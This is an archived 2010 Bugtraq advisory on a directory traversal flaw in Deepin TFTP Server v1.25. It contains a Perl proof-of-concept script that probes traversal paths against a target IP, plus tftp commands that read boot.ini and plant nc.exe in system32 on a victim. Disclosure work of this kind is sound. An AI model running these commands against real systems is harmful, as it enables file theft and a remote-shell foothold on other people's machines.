lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <201008252219487507292@venustech.com.cn>
Date: Wed, 25 Aug 2010 22:19:49 +0800
From: "黄超毅" <huang_chaoyi@...ustech.com.cn>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Deepin TFTP Server Directory Traversal Vulnerability

Software : Deepin TFTP Server Directory Traversal Vulnerability
Software Version : v1.25
Vendor: Deepin.org 
Vulnerability Published : 2010-08-14
Vulnerability Update Time :
Status : 
Impact : Medium
Bug Description :
Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an FTP client.
Proof Of Concept :
****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n";
@directory_traversal=(
'..\tmp.txt',
'..\..\tmp.txt',
'..\..\..\tmp.txt',
'..\..\..\..\tmp.txt',
'..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\..\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
	$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
	print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
	print "$dt_it";
	if($dt_it=~m/^Transferred successfully/){
		print "Directory Traversal PAYLOAD is $dt_content.\n";
		print "Press [ENTER] Button to continue...\n";
		<STDIN>;
	}
	sleep(3);
}
print "Finish!\n";
exit(0);
****************************************************************
Exploit :
****************************************************************
#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini
#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/Venustech.GZ Branch


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ